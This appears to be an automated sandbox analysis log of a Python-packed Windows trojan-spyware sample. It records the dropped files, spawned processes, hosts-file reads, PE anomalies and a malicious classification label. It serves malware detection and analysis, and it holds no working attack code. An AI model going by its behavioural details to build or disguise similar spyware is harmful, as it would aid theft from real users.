Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE5510	2_2_00007FFD3FBE5510
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE6564	2_2_00007FFD3FBE6564
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE4287	2_2_00007FFD3FBE4287
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE542F	2_2_00007FFD3FBE542F
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE5047	2_2_00007FFD3FBE5047
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE54CA	2_2_00007FFD3FBE54CA
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE15C8	2_2_00007FFD3FBE15C8
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE5BF0	2_2_00007FFD3FBE5BF0
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE44C6	2_2_00007FFD3FBE44C6
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE560F	2_2_00007FFD3FBE560F
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE710D	2_2_00007FFD3FBE710D
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE5F10	2_2_00007FFD3FBE5F10
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBE53A8	2_2_00007FFD3FBE53A8
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FBFD260	2_2_00007FFD3FBFD260
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FD211E0	2_2_00007FFD3FD211E0
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FD0D1E0	2_2_00007FFD3FD0D1E0
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: 2_2_00007FFD3FC05200	2_2_00007FFD3FC05200

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE698D appears 71 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE2A04 appears 177 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE2734 appears 723 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE1EF1 appears 1909 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE24B9 appears 126 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE483B appears 178 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE688E appears 46 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FE264CA appears 58 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE4D68 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE4057 appears 1128 times
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Code function: String function: 00007FFD3FBE300D appears 100 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00440490 appears 96 times

Source: _overlapped.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: file.exe	Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_msi.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_tkinter.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_uuid.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_zoneinfo.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCOMCTL32.DLLj% vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepython39.dll. vs file.exe
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametcl86.dllP vs file.exe
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametk86.dllP vs file.exe
Source: file.exe, 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs file.exe
Source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs file.exe
Source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepyexpat.pyd. vs file.exe
Source: file.exe, 00000000.00000002.235504122.0000000003519000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs file.exe
Source: file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs file.exe
Source: file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs file.exe

Source: test.exe.0.dr

Static PE information: Number of sections : 11 > 10

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=552
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=716
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=636
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=640
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=736
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=552	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=716	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=636	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=736	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

File created: C:\Users\user\AppData\stink

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539

Jump to behavior

Source: classification engine

Classification label: mal76.troj.spyw.evad.winEXE@19/44@2/2

Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041DFE0 GetModuleFileNameW,SetConsoleCtrlHandler,CreateDirectoryW,CreateDirectoryW,CreateFileW,CreateFileW,SetFilePointer,SetFilePointer,SetFilePointer,ReadFile,ReadFile,SetFilePointer,ReadFile,malloc,malloc,malloc,CreateFileW,WriteFile,WriteFile,_assert,CloseHandle,FindCloseChangeNotification,GetLastError,FormatMessageA,puts,puts,CreateDirectoryW,GetCurrentProcessId,SetEnvironmentVariableA,GetCommandLineW,CreateProcessW,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetLastError,FormatMessageA,puts,_assert,_assert,_assert,_assert,_assert,_assert,_assert,_assert,GetLastError,FormatMessageA,puts,puts,_assert,_assert,_assert,_assert,puts,_putws,abort,_assert,abort,

0_2_0041DFE0

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe

File opened: C:\Users\user\Desktop\pyvenv.cfg

Jump to behavior

Source: file.exe

Static file information: File size 9189187 > 1048576

Source:	Binary string: D:\_w\2\b\bin\amd64\_socket.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233979809.00007FFD52DF9000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_elementtree.pdb source: test.exe, 00000001.00000002.232393816.00007FFD43562000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_ssl.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\unicodedata.pdb source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232132374.00007FFD40B6B000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_lzma.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233760323.00007FFD5138D000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\python39.pdb source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231915752.00007FFD40522000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_multiprocessing.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233481520.00007FFD50964000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_uuid.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: file.exe, 00000000.00000002.235504122.000000000342C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_hashlib.pdb source: file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_tkinter.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\39\b\libssl-1_1.pdb?? source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232265746.00007FFD40BF5000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_zoneinfo.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_overlapped.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\select.pdb source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.234296791.00007FFD59254000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\A\39\b\libssl-1_1.pdb source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232265746.00007FFD40BF5000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\pyexpat.pdb source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232326114.00007FFD43524000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: comctl32v582.pdbGCTL source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1m 14 Dec 2021built on: Sun Dec 19 14:27:21 2021 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: file.exe, 00000000.00000002.235504122.000000000342C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_bz2.pdb source: test.exe, 00000001.00000002.233902072.00007FFD5269F000.00000002.00000001.01000000.00000009.sdmp, test.exe, 00000002.00000002.222666433.00007FFD5269F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.234378780.00007FFD59271000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: C:\A\39\b\libcrypto-1_1.pdb source: test.exe, 00000001.00000002.231665482.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_queue.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32v582.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_msi.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_lzma.pdbMM source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233760323.00007FFD5138D000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\sqlite3.pdb source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_ctypes.pdb source: test.exe, 00000001.00000002.233156751.00007FFD435C1000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: The standard debugger class (pdb.Pdb) is an example. source: file.exe, 00000000.00000002.235504122.0000000002666000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.230098238.00000000005FE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\_w\2\b\bin\amd64\_sqlite3.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040422D push 5B058B48h; retn 0003h

0_2_00404232

Source: file.exe	Static PE information: section name: .eh_fram
Source: file.exe	Static PE information: section name: .xdata
Source: libcrypto-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: test.exe.0.dr	Static PE information: section name: .eh_fram
Source: test.exe.0.dr	Static PE information: section name: .xdata
Source: libssl-1_1.dll.0.dr	Static PE information: section name: .00cfg
Source: vcruntime140.dll.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004016D0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004016D0

Source: file.exe	Static PE information: real checksum: 0x310de should be: 0x8cae52
Source: test.exe.0.dr	Static PE information: real checksum: 0x1f77c9 should be: 0x956e87

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\python39.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_msi.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\tcl86t.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_multiprocessing.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\comctl32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_tkinter.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_overlapped.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\_uuid.pyd	Jump to dropped file
